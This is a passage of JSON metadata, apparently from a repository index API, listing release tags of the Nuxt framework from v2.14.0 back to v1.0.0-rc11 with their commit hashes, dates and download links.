b80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_u